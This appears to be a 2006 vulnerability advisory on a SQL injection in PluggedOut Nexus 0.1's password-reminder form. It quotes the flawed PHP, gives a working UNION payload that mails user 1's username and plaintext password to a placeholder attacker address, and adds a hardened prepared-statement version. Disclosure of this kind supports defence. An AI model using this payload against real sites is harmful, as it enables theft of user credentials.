Type packetstorm
Reporter Hamid Ebadi
Modified 2006-03-03T00:00:00


PluggedOut Nexus SQL injection
Nexus is an open source script you can run on your web server to give you a community based website where people can register, search each other's interests, and communicate with one another either through a private messaging system, or via chat requests and forums.
Project : PluggedOut Nexus  
Version : 0.1  
Author : Jonathan Beckett  
Home :  
The information has been provided by Hamid Ebadi .  
( Hamid Network Security Team): admin[AT]hamid[o]ir  
The original article can be found at:  
Vulnerable Systems: PluggedOut Nexus 0.1
At this address (the "forgotten_password.php" form), if you fill in the private e-mail address that you used while creating your account, the server sends an e-mail with your login details to that address.
Input passed to the "email" parameter in  
"forgotten_password.php" isn't properly sanitised  
before being used in a SQL query. This can be  
exploited to manipulate SQL queries by injecting  
arbitrary SQL code.  
In the E-Mail Address form enter a single quote (') and press Send Request. You will be redirected to http://localhost/Nexus/site_problem.php and see:
Problem with Nexus website  
A problem has occurred with the Nexus website - this  
was not your fault, and the administrators probably  
already know about it.  
Vulnerable Code: The following lines in "forgotten_password.php" (several lines are cut off in the advisory; the cut-off points are marked with comments):

if ($_POST["submit"]!=""){
    $con = db_connect();
    // The rest of this line is missing from the advisory; the posted "email" value is concatenated into the WHERE clause without escaping.
    $sql = "SELECT cUsername,cPassword,cEMailPrivate FROM nexus_users WHERE
    $result = mysql_query($sql,$con);
    if ($result!=false){
        if (mysql_num_rows($result)>0){
            $row = mysql_fetch_array($result);
            $from = $site_admin_email;
            $to = $row["cEMailPrivate"];
            $subject = "Reminder Username/Password from   // truncated in the advisory
            $body = "This email has been sent following a request for a reminder username/password in the ".$site_long_name." website.\n\n"
                ."Your account details are as follows;\n"
                ." Username : ".$row["cUsername"]."\n"
                ." Password : ".$row["cPassword"]."\n\n"
                ."If you did not request this reminder message, please contact the ".$site_long_name." administrator   // truncated in the advisory
Insert this code in the E-Mail Address form (http://localhost/Nexus/forgotten_password.php):
hamidnetworksecurityteam' union select  
cUsername,cPassword,'ATTACKER@EMAIL.ADDRESS' from  
nexus_users WHERE nUserId=1 and '1'='1  
and ATTACKER@EMAIL.ADDRESS receives an e-mail containing the username and password for user ID 1.
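The root cause is that the posted "email" value is spliced into the query string. The following is an added example, not code from the Nexus project, of how the lookup could be written so that the injected quote and UNION have no effect; it assumes db_connect() returns a mysqli connection (the original uses the mysql_* functions), that get_result() is available (mysqlnd), and it keeps the advisory's table and column names.

```php
<?php
// Added example (not the Nexus project's code): a hardened lookup for
// forgotten_password.php. Assumption: db_connect() returns a mysqli object.

function lookup_account_by_email(mysqli $con, string $email): ?array
{
    // Reject anything that is not a syntactically valid e-mail address before
    // it reaches the database. A value such as "x' union select ..." fails
    // this check outright.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }

    // Bind the value instead of concatenating it: the SQL text and the
    // parameter travel separately, so quote characters in the input can
    // never change the structure of the statement.
    $stmt = $con->prepare(
        'SELECT cUsername, cPassword, cEMailPrivate FROM nexus_users WHERE cEMailPrivate = ?'
    );
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $result = $stmt->get_result();
    $row = ($result !== false) ? $result->fetch_assoc() : null;
    $stmt->close();
    return $row ?: null;
}

if (isset($_POST['submit']) && $_POST['submit'] !== '') {
    $con = db_connect();
    $row = lookup_account_by_email($con, (string)($_POST['email'] ?? ''));
    if ($row !== null) {
        // Send only to the address stored in the row, never to one taken
        // from the request. The original mails $row['cPassword'] back in
        // clear text; the mail-building code is unchanged here and omitted.
        $to = $row['cEMailPrivate'];
    }
    // Same response whether or not a row matched, so the form does not
    // reveal which addresses are registered.
    echo 'If that address is registered, a reminder has been sent.';
}
```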